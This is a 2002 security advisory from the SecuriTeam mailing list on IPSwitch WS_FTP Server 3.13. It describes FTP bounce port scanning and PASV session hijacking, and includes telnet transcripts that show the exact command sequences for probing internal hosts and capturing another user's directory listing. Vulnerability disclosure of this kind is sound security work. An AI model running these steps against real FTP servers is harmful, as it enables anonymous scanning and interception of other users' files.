[NT] IPSwitch WS_FTP Server PASV Session Hijacking and PASV Port Scan

From: support@securiteam.com
Date: 10/25/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 25 Oct 2002 17:07:50 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  IPSwitch WS_FTP Server PASV Session Hijacking and PASV Port Scan
------------------------------------------------------------------------

SUMMARY

IPSwitch's WS_FTP Server allows remote attackers to do two things, one use
it to bounce attacks through the FTP Server, and to hijack existing FTP
Sessions.

DETAILS

Vulnerable systems:
 * IPSwitch WS_FTP Server version 3.13

Impact:
The FTP bounce vulnerability allows a remote attacker to cause the FTP
server to create a connection to any IP address on any TCP port greater
than 1024. Thus, the attacker can scan Internet addresses anonymously
along with any internal addresses that the FTP server has access to. More
information on this vulnerability can be found here:
<http://www.cert.org/advisories/CA-1997-27.html.>
http://www.cert.org/advisories/CA-1997-27.html.

The PASV connection hijacking vulnerability allows a remote attacker to
intercept directory listings and file downloads from other users; file
uploads may also be spoofed. No authentication is necessary to execute
this attack. More information on this vulnerability can be found here:
<http://www.kb.cert.org/vuls/id/2558> http://www.kb.cert.org/vuls/id/2558.

Details:
This demonstrates the FTP bounce vulnerability. The internal IP address,
"192.168.1.20", is listening on port 8080, and "192.168.2.30" is dead or
not accessible via port 8080:

$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.

This demonstrates the PASV connection hijacking vulnerability:
$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing

Next, from another IP address:
$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 .
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 ..
- -rwxr-x--- 1 lowhalo System 1337 Jan 0 00:00 lh
Connection closed by foreign host.

ADDITIONAL INFORMATION

The information has been provided by <mailto:lowhalo@hushmail.com> low
halo.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NT] Vulnerabilities in TCP/IP Allow Remote Code Execution and DoS (MS05-019)
    ... Validation, ICMP Connection Reset, ICMP Path MTU, TCP Connection Reset and ... An attacker who successfully exploited the most severe of these ... vulnerabilities could take complete control of an affected system. ... * ICMP Connection Reset Vulnerability - CAN-2004-0790 ...
    (Securiteam)
  • RE: Telnet/ftp problems SBS2000
    ... Please make sure your client computers are configured as both Firewall ... will find two options "Enable folder view for FTP sites" and "Use Passive ... that the control connection has been successfully established, ... (other than port 21) ...
    (microsoft.public.windows.server.sbs)
  • Re: IPSwitch, Inc. WS_FTP Server
    ... > bounce attack as well as PASV connection hijacking. ... > The FTP bounce vulnerability allows a remote attacker to cause the ... > anonymously along with any internal addresses that the FTP server has ... That means it's got to handle a PORT ...
    (Bugtraq)
  • [NT] Vulnerability in Server Service Could Allow Remote Code Execution (MS06-035)
    ... Vulnerability in Server Service Could Allow Remote Code Execution ... Firewall best practices and standard default firewall configurations ... This port is used to initiate a connection with the affected component. ... Internet to help prevent attacks that may use other ports. ...
    (Securiteam)
  • Re: FTP question
    ... |> I have one server that has had connectivity issues this past week ... |> directed at trying yet another ftp software. ... |> or an error about the socket connection. ... |> own modem and a Linksey router using Xp 64bit system. ...
    (microsoft.public.windowsxp.network_web)